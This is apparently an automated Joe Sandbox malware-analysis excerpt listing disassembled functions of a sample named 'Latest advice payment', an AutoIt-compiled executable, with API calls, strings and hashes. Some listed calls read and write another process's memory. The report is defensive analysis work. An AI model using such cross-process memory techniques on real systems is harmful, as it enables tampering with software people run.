                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 7c5a15294b25ce17ce8918c6fff5192913b1889bfc9ed812b61b3407673d81a8
                                                            • Instruction ID: 3f3ff1382d385b60614ec5346c7f1a8fd5b6346b6654a47f639291d42a494e74
                                                            • Opcode Fuzzy Hash: 7c5a15294b25ce17ce8918c6fff5192913b1889bfc9ed812b61b3407673d81a8
                                                            • Instruction Fuzzy Hash: 6EF01930010F49EBDB355F26EC8C7683FA6B710326F089225E46B4A0F1CB79499AEF14
                                                            Function 00572CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00580DB6: std::exception::exception.LIBCMT ref: 00580DEC
                                                              • Part of subcall function 00580DB6: __CxxThrowException@8.LIBCMT ref: 00580E01
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 00567A51: _memmove.LIBCMT ref: 00567AAB
                                                            • __swprintf.LIBCMT ref: 00572ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00572D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 9b6fa554b2d7405df5755ef5eed89b6bd369c9a6b2d1849ac70037c39d75ae08
                                                            • Instruction ID: e8a995b9d2600066f2de85a3da38ed004672e9ecc1061c091904fa663b22c14a
                                                            • Opcode Fuzzy Hash: 9b6fa554b2d7405df5755ef5eed89b6bd369c9a6b2d1849ac70037c39d75ae08
                                                            • Instruction Fuzzy Hash: B1914B711082169FC714EF24D899C7EBFA8FF95710F04891DF8969B2A1EA30ED44DB62
                                                            Function 005CB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                            • CoInitialize.OLE32(00000000), ref: 005CB9BB
                                                            • CoCreateInstance.OLE32(005F2D6C,00000000,00000001,005F2BDC,?), ref: 005CB9D4
                                                            • CoUninitialize.OLE32 ref: 005CB9F1
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: cd38592b405de634744a4b578a03289275689b41496167f719b2bf2f8d65a604
                                                            • Instruction ID: b06fc75dd164e3b2bbbe418fa7a611de0b11bef8cf4c10102aa56e11c144b6a1
                                                            • Opcode Fuzzy Hash: cd38592b405de634744a4b578a03289275689b41496167f719b2bf2f8d65a604
                                                            • Instruction Fuzzy Hash: F8A143756042069FDB00DF54C885E6ABBE9FF89314F048998F8999B3A1CB31ED46CB91
                                                            Function 005BB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 005BB4BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%_
                                                            • API String ID: 3565006973-162890803
                                                            • Opcode ID: 6973225da18c206b0c572df94fdcaa5d6ca7c055b4f73de5a5e60ddf84e56767
                                                            • Instruction ID: b57220d1a5dbf3895a6f695e8ca79949ba0cbd88599f86746c232edca6a7c98f
                                                            • Opcode Fuzzy Hash: 6973225da18c206b0c572df94fdcaa5d6ca7c055b4f73de5a5e60ddf84e56767
                                                            • Instruction Fuzzy Hash: 4E913C70600601AFEB64DF64C884BAABBF5FF49710F24856DF946CB291EBB1E841CB50
                                                            Function 0058501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 005850AD
                                                              • Part of subcall function 005900F0: __87except.LIBCMT ref: 0059012B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: 5bd1ad895c36d202c91672aa9bff50113c23c0d845fd19adefcb985738e0d224
                                                            • Instruction ID: e704bf5b098215ba089ee49a271e5b2803e44d820480b92d27efa90036c3e96c
                                                            • Opcode Fuzzy Hash: 5bd1ad895c36d202c91672aa9bff50113c23c0d845fd19adefcb985738e0d224
                                                            • Instruction Fuzzy Hash: A9512525A08606CADF117724CD0937E2F94BB80700F249D59E8D5962E9FF388DD8EB86
                                                            Function 005A8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: 3cW$_W
                                                            • API String ID: 4104443479-1067530677
                                                            • Opcode ID: 530d2c689b4578e949f9eb7fcf3b938da0075b01f97a678b51eaaebe3bae92bc
                                                            • Instruction ID: 441727cbe9ab7ac0036a9adf93986eda377ec654a01ce782415de56eeeca7bf2
                                                            • Opcode Fuzzy Hash: 530d2c689b4578e949f9eb7fcf3b938da0075b01f97a678b51eaaebe3bae92bc
                                                            • Instruction Fuzzy Hash: 7D5168B0E006199FCB64CF68D884ABEBBF1FF45304F24852AE85AD7250EB30A955CF51
                                                            Function 005B97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005B9296,?,?,00000034,00000800,?,00000034), ref: 005C14E6
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005B983F
                                                              • Part of subcall function 005C1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005B92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 005C14B1
                                                              • Part of subcall function 005C13DE: GetWindowThreadProcessId.USER32(?,?), ref: 005C1409
                                                              • Part of subcall function 005C13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005B925A,00000034,?,?,00001004,00000000,00000000), ref: 005C1419
                                                              • Part of subcall function 005C13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005B925A,00000034,?,?,00001004,00000000,00000000), ref: 005C142F
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005B98AC
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005B98F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: b74fe09f3dacd11eb9f63184a5c5af7a2cd5156f8bd6fb1a2a917ecba4bab89c
                                                            • Instruction ID: cd57f1308e8b57ca5da4df1f3862436a647943f60e859b0634afbb18576b815e
                                                            • Opcode Fuzzy Hash: b74fe09f3dacd11eb9f63184a5c5af7a2cd5156f8bd6fb1a2a917ecba4bab89c
                                                            • Instruction Fuzzy Hash: D8414C76900219AFDB14DFA4CD85EDEBBB8FB4A700F004099FA45B7191DA716E45CBA0
                                                            Function 005E7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005EF910,00000000,?,?,?,?), ref: 005E79DF
                                                            • GetWindowLongW.USER32 ref: 005E79FC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005E7A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 1864ec6c1941a5a751b737709deeae81a4a62f6b55a6bab4f16846db7174645b
                                                            • Instruction ID: 7c1251ddf5523eeaf989d6bec23470709d6e59dfbe6f6d62c96c9bf336e51951
                                                            • Opcode Fuzzy Hash: 1864ec6c1941a5a751b737709deeae81a4a62f6b55a6bab4f16846db7174645b
                                                            • Instruction Fuzzy Hash: 1931F23120464AABDB288F35CC45BEA7BA9FF48324F204725F8B5D32E1D730E8509B50
                                                            Function 005E73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 005E7461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 005E7475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 005E7499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 0457603d4045eb097942d4979ff1f199e5a46d752f350fcbe4b28e705147ed95
                                                            • Instruction ID: 30c854ba0fbe446c25994eae29b0776a8bdfae304032461b1f959a227f158b3d
                                                            • Opcode Fuzzy Hash: 0457603d4045eb097942d4979ff1f199e5a46d752f350fcbe4b28e705147ed95
                                                            • Instruction Fuzzy Hash: 1221E132100259ABDF258E94CC46FEA3F7AFB4C724F110214FE556B1D0DA75AC909BA0
                                                            Function 005E7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005E7C4A
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005E7C58
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005E7C5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: 62f2b1fca698d8fe811839a8a6145dfc6ce58a11de6bacfbb297fba5b5e747ee
                                                            • Instruction ID: c77f06d68ea19fdb4f79942c0b9dbcc8f0ab7d73c0cf91523c3c477de7b86c07
                                                            • Opcode Fuzzy Hash: 62f2b1fca698d8fe811839a8a6145dfc6ce58a11de6bacfbb297fba5b5e747ee
                                                            • Instruction Fuzzy Hash: 5F219CB1604649AFEB24DF24DCC5CA73BADFB4A354B140459F9559B2A1CB31EC018B60
                                                            Function 005E6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005E6D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005E6D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005E6D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: f5aadd2d431c442a9f19904f8f3f8013466a43dbff1a580443b04514b5e052be
                                                            • Instruction ID: 6984e00cf676850ea7dc8bdd770ed35da2c6fef33a0aa7ececfb69402587f809
                                                            • Opcode Fuzzy Hash: f5aadd2d431c442a9f19904f8f3f8013466a43dbff1a580443b04514b5e052be
                                                            • Instruction Fuzzy Hash: 8621F232200158BFDF298F55CC85EBB3BBAFF997A0F118124F9849B1A0CA719C5187A0
                                                            Function 005D39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __snwprintf.LIBCMT ref: 005D3A66
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf_memmove
                                                            • String ID: , $$AUTOITCALLVARIABLE%d$%_
                                                            • API String ID: 3506404897-725856461
                                                            • Opcode ID: 59bc726cba6d23f0e0baf79d4d44eb326b19e08fcd5cf47e366b3dacfb614eda
                                                            • Instruction ID: 58eb8c524b1dae718fc4604b6ede8554a876f6a62ddf52310e5be16541f8c157
                                                            • Opcode Fuzzy Hash: 59bc726cba6d23f0e0baf79d4d44eb326b19e08fcd5cf47e366b3dacfb614eda
                                                            • Instruction Fuzzy Hash: 4B21617170021AAECF10EF68CC86AAE7FB5BF88700F544456F545A7282DB30EA45CB62
                                                            Function 005E770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005E7772
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005E7787
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005E7794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: 6f2d64cf12d55c47d99fc217ec5a6e6b253b60acc57e79c54597ec327726b0b5
                                                            • Instruction ID: 2da34952a5b70678657f68a213ce03cfdf91a57011e6da820bfe48d4285c6b85
                                                            • Opcode Fuzzy Hash: 6f2d64cf12d55c47d99fc217ec5a6e6b253b60acc57e79c54597ec327726b0b5
                                                            • Instruction Fuzzy Hash: 6B113A72244249BFEF245F61CC05FE73B69FF8CB54F010518F68196090C671E851CB20
                                                            Function 00586B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: a$@Bb
                                                            • API String ID: 3494438863-3557447813
                                                            • Opcode ID: 29253178a87600eed9c3ee5f89498e63b68a56e2995198b18db793d2d6b14609
                                                            • Instruction ID: e62121db8be38f47f789839764bbd38882cf5d6c68f428452520751e81c5ffc9
                                                            • Opcode Fuzzy Hash: 29253178a87600eed9c3ee5f89498e63b68a56e2995198b18db793d2d6b14609
                                                            • Instruction Fuzzy Hash: 48F04F7120AA12CBE774AF68BC52AB22F96F744775F54042AE901EE1D0EB70C98287C4
                                                            Function 00589B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock.LIBCMT ref: 00589B94
                                                              • Part of subcall function 00589C0B: __mtinitlocknum.LIBCMT ref: 00589C1D
                                                              • Part of subcall function 00589C0B: EnterCriticalSection.KERNEL32(00000000,?,00589A7C,0000000D), ref: 00589C36
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00589BA4
                                                              • Part of subcall function 00589100: ___addlocaleref.LIBCMT ref: 0058911C
                                                              • Part of subcall function 00589100: ___removelocaleref.LIBCMT ref: 00589127
                                                              • Part of subcall function 00589100: ___freetlocinfo.LIBCMT ref: 0058913B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                            • String ID: 8a$8a
                                                            • API String ID: 547918592-4001635133
                                                            • Opcode ID: b42c87632012779dc191ca50036604e3c735f24e1685d8ccdd66b8db7012aa4d
                                                            • Instruction ID: 063ed7b9b9af707b2d44a41b9228f616ce52e6d20a1ab902ed017c07380daf01
                                                            • Opcode Fuzzy Hash: b42c87632012779dc191ca50036604e3c735f24e1685d8ccdd66b8db7012aa4d
                                                            • Instruction Fuzzy Hash: 36E0863154B302A7E710FBE46A0B7A87E51BB80B21F6C515AFC45750C1CD7548408757
                                                            Function 00564C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00564BD0,?,00564DEF,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00564C23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
